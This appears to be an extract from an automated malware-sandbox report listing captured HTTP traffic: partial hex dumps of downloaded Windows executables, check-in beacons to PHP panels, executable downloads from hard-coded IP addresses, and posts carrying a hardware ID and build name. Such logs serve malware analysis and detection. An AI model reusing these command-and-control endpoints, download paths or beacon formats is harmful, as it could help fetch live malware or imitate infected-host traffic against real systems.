Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:17:03 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 
90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:17:11 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:17:17 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 
90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002776001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002777001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build"tale------CGHDAKKJJJKJKECBGCGD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002778001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"tale------EBAFBGIDHCBFHIECFCBG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002779001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="build"tale------HDHCFIJEGCAKJJKEHJJE--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="build"tale------HJEHIJEBKEBFBFHIIDHI--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 2d 2d 0d 0a Data Ascii: ------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="build"tale------CFHCBKKFIJJJECAAFCGI--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 30 44 41 32 30 31 36 45 44 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="hwid"90DA2016EDA11720009369------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="build"tale------FHCGCFHDHIIIDGCAAEGD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
